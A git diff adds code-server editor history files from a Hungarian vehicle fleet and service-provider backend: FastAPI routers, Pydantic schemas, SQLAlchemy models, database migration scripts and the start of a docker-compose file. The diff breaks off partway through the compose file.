mode 100755 index 0000000..6d617b4 --- /dev/null +++ b/code-server-config/data/User/History/-719dbe4/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote:/config/data/User/settings.json","entries":[{"id":"2C3o.json","timestamp":1769021479748}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-72cc77ef/84BA.py b/code-server-config/data/User/History/-72cc77ef/84BA.py new file mode 100755 index 0000000..ec50041 --- /dev/null +++ b/code-server-config/data/User/History/-72cc77ef/84BA.py @@ -0,0 +1,71 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def seed_cost_types(): + engine = create_async_engine(DATABASE_URL) + async with engine.begin() as conn: + print("🔨 Költség típusok tábla létrehozása...") + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS ref.cost_types ( + code VARCHAR(50) PRIMARY KEY, + name VARCHAR(100) NOT NULL, + parent_code VARCHAR(50) REFERENCES ref.cost_types(code), -- Hierarchia! + is_active BOOLEAN DEFAULT TRUE, + sort_order INTEGER DEFAULT 0 + ); + """)) + + print("📥 Adatok feltöltése...") + # Először a szülők (Főkategóriák) + parents = [ + ('FUEL', '⛽ Tankolás', 10), + ('PURCHASE', '💰 Beszerzés / Pénzügy', 20), + ('INSURANCE', '📄 Biztosítás', 30), + ('TAX', '🏛️ Adó / Illeték', 40), + ('SERVICE', '🔧 Szerviz', 50), + ('OTHER', 'Egyéb', 99) + ] + for p in parents: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, sort_order) VALUES (:c, :n, :s) ON CONFLICT (code) DO NOTHING"), {"c": p[0], "n": p[1], "s": p[2]}) + + # Aztán a gyerekek (Alkategóriák) + children = [ + # Beszerzés + ('PURCHASE_PRICE', 'Vételár', 'PURCHASE'), + ('FINANCE_LEASE', 'Lízing díj', 'PURCHASE'), + ('FINANCE_LOAN', 'Hitel törlesztő', 'PURCHASE'), + ('IMPORT_FEE', 'Honosítás / Regadó', 'PURCHASE'), + # Biztosítás + ('INSURANCE_KGFB', 'Kötelező (KGFB)', 'INSURANCE'), + ('INSURANCE_CASCO', 'Casco', 'INSURANCE'), + ('INSURANCE_GAP', 'GAP', 'INSURANCE'), + ('INSURANCE_ASSIST', 'Assistance', 'INSURANCE'), + # Adó + ('TAX_WEIGHT', 'Gépjárműadó (Súlyadó)', 'TAX'), + ('TAX_COMPANY', 'Cégautóadó', 'TAX'), + ('TAX_TRANSFER', 'Vagyonszerzési illeték', 'TAX'), + ('TAX_OTHER', 'Egyéb adó', 'TAX'), + # Szerviz + ('SERVICE_MAINTENANCE', 'Kötelező karbantartás', 'SERVICE'), + ('SERVICE_REPAIR', 'Javítás', 'SERVICE'), + ('SERVICE_TIRE', 'Gumicsere', 'SERVICE'), + ('SERVICE_MOT', 'Műszaki vizsga', 'SERVICE') + ] + for c in children: + await conn.execute(text("INSERT INTO ref.cost_types (code, name, parent_code) VALUES (:c, :n, :p) ON CONFLICT (code) DO NOTHING"), {"c": c[0], "n": c[1], "p": c[2]}) + + print("✅ KÉSZ! A tudás most már az adatbázisban van, nem a HTML-ben.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(seed_cost_types()) \ No newline at end of file diff --git a/code-server-config/data/User/History/-72cc77ef/entries.json b/code-server-config/data/User/History/-72cc77ef/entries.json new file mode 100755 index 0000000..fe7f3c7 --- /dev/null +++ b/code-server-config/data/User/History/-72cc77ef/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/migrate_ref_data.py","entries":[{"id":"84BA.py","timestamp":1768948294644}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/-7a78fe9d/0L8o.py b/code-server-config/data/User/History/-7a78fe9d/0L8o.py new file mode 100755 index 0000000..fe733c7 --- /dev/null +++ b/code-server-config/data/User/History/-7a78fe9d/0L8o.py @@ -0,0 +1,37 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional, List +from datetime import datetime +from app.models.social import ModerationStatus, SourceType + +# --- Alap Sémák --- + +class ServiceProviderBase(BaseModel): + name: str + address: Optional[str] = None + category: Optional[str] = None + source: SourceType = SourceType.manual + +class ServiceProviderCreate(ServiceProviderBase): + pass + +class ServiceProviderResponse(ServiceProviderBase): + id: int + status: ModerationStatus + validation_score: int # Látni kell a pontszámot + evidence_image_path: Optional[str] = None + added_by_user_id: Optional[int] = None + created_at: datetime + + model_config = ConfigDict(from_attributes=True) + +# --- Voting & Gamification Sémák --- + +class VoteCreate(BaseModel): + vote_value: int # Csak a +1 vagy -1 kell, a user_id jön a tokenből, a provider_id az URL-ből + +class LeaderboardEntry(BaseModel): + username: str + points: int + rank: int + + model_config = ConfigDict(from_attributes=True) \ No newline at end of file diff --git a/code-server-config/data/User/History/-7a78fe9d/O0ij.py b/code-server-config/data/User/History/-7a78fe9d/O0ij.py new file mode 100755 index 0000000..352ab36 --- /dev/null +++ b/code-server-config/data/User/History/-7a78fe9d/O0ij.py @@ -0,0 +1,31 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional +from datetime import datetime +from app.models.social import ModerationStatus, SourceType + +# --- Alap Sémák --- + +class ServiceProviderBase(BaseModel): + name: str + address: Optional[str] = None + # Fontos: Kisbetűs 'manual', ahogy a modellben is van! + source: SourceType = SourceType.manual + +class ServiceProviderCreate(ServiceProviderBase): + pass + +class ServiceProviderResponse(ServiceProviderBase): + id: int + status: ModerationStatus + validation_score: int # Ezt is visszaadjuk, hogy lássuk a pontokat + evidence_image_path: Optional[str] = None + added_by_user_id: Optional[int] = None + created_at: datetime + + model_config = ConfigDict(from_attributes=True) + +# --- EZ HIÁNYZOTT: A Szavazás Sémája --- +class VoteCreate(BaseModel): + user_id: int + provider_id: int + vote_value: int # +1 vagy -1 \ No newline at end of file diff --git a/code-server-config/data/User/History/-7a78fe9d/Qkh3.py b/code-server-config/data/User/History/-7a78fe9d/Qkh3.py new file mode 100755 index 0000000..03245fb --- /dev/null +++ b/code-server-config/data/User/History/-7a78fe9d/Qkh3.py @@ -0,0 +1,26 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional +from datetime import datetime +from app.models.social import ModerationStatus, SourceType + +# Közös alapmezők +class ServiceProviderBase(BaseModel): + name: str + address: Optional[str] = None + source: SourceType = SourceType.MANUAL + +# Amit a kliens küld (Létrehozás) +class ServiceProviderCreate(ServiceProviderBase): + pass + # A status-t NEM engedjük itt beállítani, azt a Service réteg kezeli! + +# Amit a kliens visszakap (Válasz) +class ServiceProviderResponse(ServiceProviderBase): + id: int + status: ModerationStatus + evidence_image_path: Optional[str] = None + added_by_user_id: Optional[int] = None + created_at: datetime + + # Ez biztosítja, hogy az SQLAlchemy ORM objektumot át tudja alakítani JSON-né + model_config = ConfigDict(from_attributes=True) \ No newline at end of file diff --git a/code-server-config/data/User/History/-7a78fe9d/X8oQ.py b/code-server-config/data/User/History/-7a78fe9d/X8oQ.py new file mode 100755 index 0000000..3673e82 --- /dev/null +++ b/code-server-config/data/User/History/-7a78fe9d/X8oQ.py @@ -0,0 +1,26 @@ +from pydantic import BaseModel, ConfigDict +from typing import Optional +from datetime import datetime +from app.models.social import ModerationStatus, SourceType + +# Közös alapmezők +class ServiceProviderBase(BaseModel): + name: str + address: Optional[str] = None + source: SourceType = SourceType.manual + +# Amit a kliens küld (Létrehozás) +class ServiceProviderCreate(ServiceProviderBase): + pass + # A status-t NEM engedjük itt beállítani, azt a Service réteg kezeli! + +# Amit a kliens visszakap (Válasz) +class ServiceProviderResponse(ServiceProviderBase): + id: int + status: ModerationStatus + evidence_image_path: Optional[str] = None + added_by_user_id: Optional[int] = None + created_at: datetime + + # Ez biztosítja, hogy az SQLAlchemy ORM objektumot át tudja alakítani JSON-né + model_config = ConfigDict(from_attributes=True) \ No newline at end of file diff --git a/code-server-config/data/User/History/-7a78fe9d/entries.json b/code-server-config/data/User/History/-7a78fe9d/entries.json new file mode 100755 index 0000000..0fb852c --- /dev/null +++ b/code-server-config/data/User/History/-7a78fe9d/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/schemas/social.py","entries":[{"id":"Qkh3.py","timestamp":1769026111887},{"id":"X8oQ.py","timestamp":1769032872830},{"id":"O0ij.py","timestamp":1769035431594},{"id":"0L8o.py","timestamp":1769035806952}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/0390.py b/code-server-config/data/User/History/10134b39/0390.py new file mode 100755 index 0000000..93900ac --- /dev/null +++ b/code-server-config/data/User/History/10134b39/0390.py @@ -0,0 +1,13 @@ +from fastapi import APIRouter +from app.api.v1 import social, users, fleet, auth + +api_router = APIRouter() + +# Social (Providers, Voting, Competitions) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) +api_router.include_router(auth.router, prefix="/auth", tags=["Authentication"]) + +# Users (Profile, Me) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) + +api_router.include_router(fleet.router, prefix="/fleet", tags=["Fleet & Logistics"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/HsiU.py b/code-server-config/data/User/History/10134b39/HsiU.py new file mode 100755 index 0000000..e7cd636 --- /dev/null +++ b/code-server-config/data/User/History/10134b39/HsiU.py @@ -0,0 +1,10 @@ +from fastapi import APIRouter +from app.api.v1 import social, users, fleet + +api_router = APIRouter() + +# Social (Providers, Voting, Competitions) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) + +# Users (Profile, Me) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/JVpZ.py b/code-server-config/data/User/History/10134b39/JVpZ.py new file mode 100755 index 0000000..a18b049 --- /dev/null +++ b/code-server-config/data/User/History/10134b39/JVpZ.py @@ -0,0 +1,14 @@ +from fastapi import APIRouter +from app.api.v1 import social, users, fleet, auth + +api_router = APIRouter() + +api_router.include_router(auth.router, prefix="/auth", tags=["Authentication"]) + +# Social (Providers, Voting, Competitions) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) + +# Users (Profile, Me) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) + +api_router.include_router(fleet.router, prefix="/fleet", tags=["Fleet & Logistics"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/KxP1.py b/code-server-config/data/User/History/10134b39/KxP1.py new file mode 100755 index 0000000..734be87 --- /dev/null +++ b/code-server-config/data/User/History/10134b39/KxP1.py @@ -0,0 +1,12 @@ +from fastapi import APIRouter +from app.api.v1 import social +# Később: from app.api.v1 import vehicles, auth + +api_router = APIRouter() + +# Social modul becsatolása +api_router.include_router(social.router, prefix="/social", tags=["Social & Service Providers"]) + +# Placeholders (későbbi fázisokhoz) +# api_router.include_router(auth.router, prefix="/auth", tags=["Authentication"]) +# api_router.include_router(vehicles.router, prefix="/vehicles", tags=["Fleet Management"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/Umts.py b/code-server-config/data/User/History/10134b39/Umts.py new file mode 100755 index 0000000..0ba618e --- /dev/null +++ b/code-server-config/data/User/History/10134b39/Umts.py @@ -0,0 +1,12 @@ +from fastapi import APIRouter +from app.api.v1 import social, users, fleet + +api_router = APIRouter() + +# Social (Providers, Voting, Competitions) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) + +# Users (Profile, Me) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) + +api_router.include_router(fleet.router, prefix="/fleet", tags=["Fleet & Logistics"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/VKVZ.py b/code-server-config/data/User/History/10134b39/VKVZ.py new file mode 100755 index 0000000..5a95566 --- /dev/null +++ b/code-server-config/data/User/History/10134b39/VKVZ.py @@ -0,0 +1,12 @@ +from fastapi import APIRouter +from app.api.v1 import social, users, fleet, auth + +api_router = APIRouter() + +# Social (Providers, Voting, Competitions) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) + +# Users (Profile, Me) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) + +api_router.include_router(fleet.router, prefix="/fleet", tags=["Fleet & Logistics"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/YgmD.py b/code-server-config/data/User/History/10134b39/YgmD.py new file mode 100755 index 0000000..73d753e --- /dev/null +++ b/code-server-config/data/User/History/10134b39/YgmD.py @@ -0,0 +1,10 @@ +from fastapi import APIRouter +from app.api.v1 import social, users + +api_router = APIRouter() + +# Social (Providers, Voting, Competitions) +api_router.include_router(social.router, prefix="/social", tags=["Social & Providers"]) + +# Users (Profile, Me) +api_router.include_router(users.router, prefix="/users", tags=["Users"]) \ No newline at end of file diff --git a/code-server-config/data/User/History/10134b39/entries.json b/code-server-config/data/User/History/10134b39/entries.json new file mode 100755 index 0000000..9f15be9 --- /dev/null +++ b/code-server-config/data/User/History/10134b39/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/api/v1/router.py","entries":[{"id":"KxP1.py","timestamp":1769026197656},{"id":"YgmD.py","timestamp":1769035932510},{"id":"HsiU.py","timestamp":1769038283035},{"id":"Umts.py","timestamp":1769038293184},{"id":"VKVZ.py","timestamp":1769041601756},{"id":"0390.py","timestamp":1769041642033},{"id":"JVpZ.py","timestamp":1769041660836}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/1231c811/7V7m.py b/code-server-config/data/User/History/1231c811/7V7m.py new file mode 100755 index 0000000..0593692 --- /dev/null +++ b/code-server-config/data/User/History/1231c811/7V7m.py @@ -0,0 +1,22 @@ +from sqlalchemy import Column, Integer, String, Boolean, DateTime, Text +from sqlalchemy.sql import func +from app.db.base import Base + +class User(Base): + __tablename__ = "users" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + email = Column(String, unique=True, index=True, nullable=False) + password_hash = Column(Text, nullable=False) + + full_name = Column(String, nullable=True) + + # --- ÚJ MEZŐK --- + is_active = Column(Boolean, default=True) # Tiltáshoz (Banning) + is_superuser = Column(Boolean, default=False) + reputation_score = Column(Integer, default=0) # Trust System + # ---------------- + + created_at = Column(DateTime(timezone=True), server_default=func.now()) + updated_at = Column(DateTime(timezone=True), onupdate=func.now()) \ No newline at end of file diff --git a/code-server-config/data/User/History/1231c811/RTDs.py b/code-server-config/data/User/History/1231c811/RTDs.py new file mode 100755 index 0000000..940fcd0 --- /dev/null +++ b/code-server-config/data/User/History/1231c811/RTDs.py @@ -0,0 +1,25 @@ +from sqlalchemy import Column, Integer, String, Boolean, DateTime, Text, Date +from sqlalchemy.sql import func +from app.db.base import Base + +class User(Base): + __tablename__ = "users" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + email = Column(String, unique=True, index=True, nullable=False) + password_hash = Column(Text, nullable=False) + full_name = Column(String, nullable=True) + + # --- Social / Trust Fields --- + is_active = Column(Boolean, default=True) + is_superuser = Column(Boolean, default=False) + reputation_score = Column(Integer, default=0) + + # --- Document Tracking (ÚJ MEZŐK) --- + license_expiry_date = Column(Date, nullable=True) # Jogosítvány lejárata + id_card_expiry_date = Column(Date, nullable=True) # Személyi igazolvány lejárata + # ------------------------------------ + + created_at = Column(DateTime(timezone=True), server_default=func.now()) + updated_at = Column(DateTime(timezone=True), onupdate=func.now()) \ No newline at end of file diff --git a/code-server-config/data/User/History/1231c811/entries.json b/code-server-config/data/User/History/1231c811/entries.json new file mode 100755 index 0000000..0504430 --- /dev/null +++ b/code-server-config/data/User/History/1231c811/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/models/user.py","entries":[{"id":"mtMZ.py","timestamp":1769031796728},{"id":"7V7m.py","timestamp":1769033736530},{"id":"RTDs.py","timestamp":1769038004563}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/1231c811/mtMZ.py b/code-server-config/data/User/History/1231c811/mtMZ.py new file mode 100755 index 0000000..5b82410 --- /dev/null +++ b/code-server-config/data/User/History/1231c811/mtMZ.py @@ -0,0 +1,18 @@ +from sqlalchemy import Column, Integer, String, Boolean, DateTime, Text +from sqlalchemy.sql import func +from app.db.base import Base + +class User(Base): + __tablename__ = "users" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + email = Column(String, unique=True, index=True, nullable=False) + password_hash = Column(Text, nullable=False) + + full_name = Column(String, nullable=True) + is_active = Column(Boolean, default=True) + is_superuser = Column(Boolean, default=False) + + created_at = Column(DateTime(timezone=True), server_default=func.now()) + updated_at = Column(DateTime(timezone=True), onupdate=func.now()) \ No newline at end of file diff --git a/code-server-config/data/User/History/16d1374a/entries.json b/code-server-config/data/User/History/16d1374a/entries.json new file mode 100755 index 0000000..9c8f07c --- /dev/null +++ b/code-server-config/data/User/History/16d1374a/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/update_audit_system.py","entries":[{"id":"gs9K.py","timestamp":1768945677146}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/16d1374a/gs9K.py b/code-server-config/data/User/History/16d1374a/gs9K.py new file mode 100755 index 0000000..271eff7 --- /dev/null +++ b/code-server-config/data/User/History/16d1374a/gs9K.py @@ -0,0 +1,46 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def build_audit_system(): + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("📜 Audit Log tábla létrehozása...") + # Ez a tábla sosem töröl, csak ír! (Append-only) + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.audit_logs ( + id SERIAL PRIMARY KEY, + user_id INTEGER REFERENCES data.users(id), -- KI csinálta? + event_type VARCHAR(50) NOT NULL, -- MIT? (pl. ISSUE_REPORT, MILEAGE_UPDATE) + target_id INTEGER, -- MELYIK autón? (Vehicle ID) + old_value TEXT, -- MI volt előtte? (A visszaállításhoz) + new_value TEXT, -- MI lett utána? + details TEXT, -- Egyéb megjegyzés (pl. hiba leírása) + ip_address VARCHAR(45), -- Honnan? (Biztonság) + created_at TIMESTAMP DEFAULT NOW() + ); + """)) + + print("🚦 Jármű Státusz mezők hozzáadása...") + # Bővítjük a járműveket, hogy tárolják a hibát + await conn.execute(text(""" + ALTER TABLE data.vehicles + ADD COLUMN IF NOT EXISTS status VARCHAR(20) DEFAULT 'OK', -- OK, WARNING, CRITICAL + ADD COLUMN IF NOT EXISTS current_issue TEXT; -- A hiba leírása + """)) + + print("✅ KÉSZ! A mindent látó szem (Audit Log) aktív.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(build_audit_system()) \ No newline at end of file diff --git a/code-server-config/data/User/History/2434083a/Jrbf.py b/code-server-config/data/User/History/2434083a/Jrbf.py new file mode 100755 index 0000000..10f9af3 --- /dev/null +++ b/code-server-config/data/User/History/2434083a/Jrbf.py @@ -0,0 +1,50 @@ +import enum +from sqlalchemy import Column, Integer, String, ForeignKey, Enum, DateTime, Boolean, Date, JSON +from sqlalchemy.sql import func +from app.db.base import Base + +# Költség Kategóriák +class ExpenseCategory(str, enum.Enum): + PURCHASE_PRICE = "PURCHASE_PRICE" # Vételár + TRANSFER_TAX = "TRANSFER_TAX" # Vagyonszerzési illeték + ADMIN_FEE = "ADMIN_FEE" # Eredetiség, forgalmi, törzskönyv + VEHICLE_TAX = "VEHICLE_TAX" # Gépjárműadó + INSURANCE = "INSURANCE" # Biztosítás + REFUELING = "REFUELING" # Tankolás + SERVICE = "SERVICE" # Szerviz / Javítás + PARKING = "PARKING" # Parkolás + TOLL = "TOLL" # Autópálya matrica + FINE = "FINE" # Bírság + TUNING_ACCESSORIES = "TUNING_ACCESSORIES" # Extrák + OTHER = "OTHER" # Egyéb + +class VehicleEvent(Base): + __tablename__ = "vehicle_events" + __table_args__ = {"schema": "data"} + + id = Column(Integer, primary_key=True, index=True) + vehicle_id = Column(Integer, ForeignKey("data.vehicles.id"), nullable=False, index=True) + + # Esemény típusa + event_type = Column(Enum(ExpenseCategory, schema="data", name="expense_category_enum"), nullable=False) + + date = Column(Date, nullable=False) + + # Kilométeróra (KÖTELEZŐ!) + odometer_value = Column(Integer, nullable=False) + odometer_anomaly = Column(Boolean, default=False) # Ha csökkenést észlelünk, True lesz + + # Pénzügyek + cost_amount = Column(Integer, nullable=False, default=0) # HUF + + # Leírás és Képek + description = Column(String, nullable=True) + image_paths = Column(JSON, nullable=True) # Lista a feltöltött képek (számla, fotó) útvonalairól + + # Kapcsolat a szolgáltatóval + # Ha is_diy=True, akkor a user maga csinálta. + # Ha is_diy=False és service_provider_id=None, akkor ismeretlen helyen készült. + is_diy = Column(Boolean, default=False) + service_provider_id = Column(Integer, ForeignKey("data.service_providers.id"), nullable=True) + + created_at = Column(DateTime(timezone=True), server_default=func.now()) \ No newline at end of file diff --git a/code-server-config/data/User/History/2434083a/entries.json b/code-server-config/data/User/History/2434083a/entries.json new file mode 100755 index 0000000..587c848 --- /dev/null +++ b/code-server-config/data/User/History/2434083a/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/models/expense.py","entries":[{"id":"Jrbf.py","timestamp":1769038074585}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/2e6ecb37/RIji.py b/code-server-config/data/User/History/2e6ecb37/RIji.py new file mode 100755 index 0000000..7efe4af --- /dev/null +++ b/code-server-config/data/User/History/2e6ecb37/RIji.py @@ -0,0 +1,58 @@ +import asyncio +import os +from sqlalchemy.ext.asyncio import create_async_engine +from sqlalchemy import text +from dotenv import load_dotenv + +load_dotenv() + +raw_url = os.getenv("DATABASE_URL") +if not raw_url: + raw_url = "postgresql://admin:PASSWORD_111@postgres-db:5432/service_finder" +DATABASE_URL = raw_url.replace("postgresql://", "postgresql+asyncpg://").replace("/service_finder_db", "/service_finder") + +async def upgrade_invites(): + print(f"🔌 Kapcsolódás...") + engine = create_async_engine(DATABASE_URL) + + async with engine.begin() as conn: + print("📨 Invitations (Meghívók) tábla létrehozása...") + # Ez tárolja a függőben lévő meghívásokat + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.invitations ( + id SERIAL PRIMARY KEY, + email VARCHAR(255) NOT NULL, + inviter_id INTEGER REFERENCES data.users(id), -- Ki hívta meg? (Cég) + role VARCHAR(20) NOT NULL, -- Milyen szerepre? (MANAGER, DRIVER) + access_level VARCHAR(20) DEFAULT 'FULL', -- A/B Sofőr szint + token VARCHAR(100) UNIQUE NOT NULL, -- A titkos link kódja + status VARCHAR(20) DEFAULT 'PENDING', -- PENDING, ACCEPTED, EXPIRED + created_at TIMESTAMP DEFAULT NOW(), + expires_at TIMESTAMP + ); + """)) + + print("🤝 Fleet Members (Többcéges tagság) tábla létrehozása...") + # Ez teszi lehetővé, hogy valaki több céghez is tartozzon + await conn.execute(text(""" + CREATE TABLE IF NOT EXISTS data.fleet_members ( + id SERIAL PRIMARY KEY, + user_id INTEGER REFERENCES data.users(id), -- A Dolgozó + owner_id INTEGER REFERENCES data.users(id), -- A Cég / Tulajdonos + role VARCHAR(20) NOT NULL, -- FLEET_MANAGER, DRIVER + joined_at TIMESTAMP DEFAULT NOW(), + + -- Egy ember egy cégnél csak egyszer szerepelhet + UNIQUE(user_id, owner_id) + ); + """)) + + # Takarítás: A régi 'parent_id' már nem kell, mert a fleet_members kiváltja + # De biztonságból egyelőre csak NULL-ra állítjuk, nem töröljük az oszlopot + # await conn.execute(text("UPDATE data.users SET parent_id = NULL;")) + + print("✅ KÉSZ! A rendszer készen áll a biztonságos meghívókra.") + await engine.dispose() + +if __name__ == "__main__": + asyncio.run(upgrade_invites()) diff --git a/code-server-config/data/User/History/2e6ecb37/entries.json b/code-server-config/data/User/History/2e6ecb37/entries.json new file mode 100755 index 0000000..f6390d6 --- /dev/null +++ b/code-server-config/data/User/History/2e6ecb37/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/update_invitations.py","entries":[{"id":"RIji.py","timestamp":1768944364706}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/30eb9f94/1AIB.py b/code-server-config/data/User/History/30eb9f94/1AIB.py new file mode 100755 index 0000000..b679a19 --- /dev/null +++ b/code-server-config/data/User/History/30eb9f94/1AIB.py @@ -0,0 +1,39 @@ +from fastapi import Depends, HTTPException, status +from fastapi.security import OAuth2PasswordBearer +from jose import jwt, JWTError +from sqlalchemy.ext.asyncio import AsyncSession +from sqlalchemy import select +import os + +from app.db.session import get_db +from app.models.user import User + +oauth2_scheme = OAuth2PasswordBearer(tokenUrl="api/v1/auth/login") + +SECRET_KEY = os.getenv("SECRET_KEY") +ALGORITHM = os.getenv("ALGORITHM") + +async def get_current_user( + db: AsyncSession = Depends(get_db), + token: str = Depends(oauth2_scheme) +) -> User: + credentials_exception = HTTPException( + status_code=status.HTTP_401_UNAUTHORIZED, + detail="Érvénytelen hitelesítő adatok", + headers={"WWW-Authenticate": "Bearer"}, + ) + try: + payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM]) + email: str = payload.get("sub") + if email is None: + raise credentials_exception + except JWTError: + raise credentials_exception + + result = await db.execute(select(User).where(User.email == email)) + user = result.scalars().first() + + if user is None or not user.is_active: + raise HTTPException(status_code=403, detail="Felhasználó nem található vagy inaktív") + + return user \ No newline at end of file diff --git a/code-server-config/data/User/History/30eb9f94/entries.json b/code-server-config/data/User/History/30eb9f94/entries.json new file mode 100755 index 0000000..3a4f397 --- /dev/null +++ b/code-server-config/data/User/History/30eb9f94/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/api/deps.py","entries":[{"id":"1AIB.py","timestamp":1769041536250}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/359c80de/entries.json b/code-server-config/data/User/History/359c80de/entries.json new file mode 100755 index 0000000..0b2ab9c --- /dev/null +++ b/code-server-config/data/User/History/359c80de/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/app/api/v1/fleet.py","entries":[{"id":"iEZY.py","timestamp":1769038210566}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/359c80de/iEZY.py b/code-server-config/data/User/History/359c80de/iEZY.py new file mode 100755 index 0000000..10eff52 --- /dev/null +++ b/code-server-config/data/User/History/359c80de/iEZY.py @@ -0,0 +1,62 @@ +from fastapi import APIRouter, Depends, HTTPException, status +from sqlalchemy.ext.asyncio import AsyncSession +from typing import List + +from app.db.session import get_db +from app.schemas.fleet import VehicleCreate, VehicleResponse, EventCreate, EventResponse, TCOStats +from app.models.vehicle import Vehicle +from app.services.fleet_service import add_vehicle_event, calculate_tco + +# Mock user dependency (később cserélendő a JWT-re) +async def get_mock_current_user(): + return 2 # Good Guy + +router = APIRouter() + +# --- VEHICLE ENDPOINTS --- + +@router.post("/vehicles", response_model=VehicleResponse, status_code=status.HTTP_201_CREATED) +async def create_vehicle( + vehicle_in: VehicleCreate, + db: AsyncSession = Depends(get_db), + user_id: int = Depends(get_mock_current_user) +): + new_vehicle = Vehicle(**vehicle_in.model_dump(), user_id=user_id, current_odometer=vehicle_in.initial_odometer) + db.add(new_vehicle) + await db.commit() + await db.refresh(new_vehicle) + return new_vehicle + +@router.get("/vehicles", response_model=List[VehicleResponse]) +async def get_my_vehicles( + db: AsyncSession = Depends(get_db), + user_id: int = Depends(get_mock_current_user) +): + from sqlalchemy import select + result = await db.execute(select(Vehicle).where(Vehicle.user_id == user_id)) + return result.scalars().all() + +# --- EVENT / SERVICE BOOK ENDPOINTS --- + +@router.post("/vehicles/{vehicle_id}/events", response_model=EventResponse) +async def add_event( + vehicle_id: int, + event_in: EventCreate, + db: AsyncSession = Depends(get_db), + user_id: int = Depends(get_mock_current_user) +): + """ + Új esemény (szerviz, tankolás) rögzítése. + Automatikusan kezeli a szolgáltatókat és a km óra állást. + """ + result = await add_vehicle_event(db, vehicle_id, event_in, user_id) + + if isinstance(result, dict) and "error" in result: + raise HTTPException(status_code=404, detail=result["error"]) + + return result + +@router.get("/vehicles/{vehicle_id}/stats", response_model=TCOStats) +async def get_vehicle_stats(vehicle_id: int, db: AsyncSession = Depends(get_db)): + """Költségek elemzése és TCO mutatók""" + return await calculate_tco(db, vehicle_id) \ No newline at end of file diff --git a/code-server-config/data/User/History/37941b6f/5wWC.yml b/code-server-config/data/User/History/37941b6f/5wWC.yml new file mode 100755 index 0000000..b02c63e --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/5wWC.yml @@ -0,0 +1,94 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az 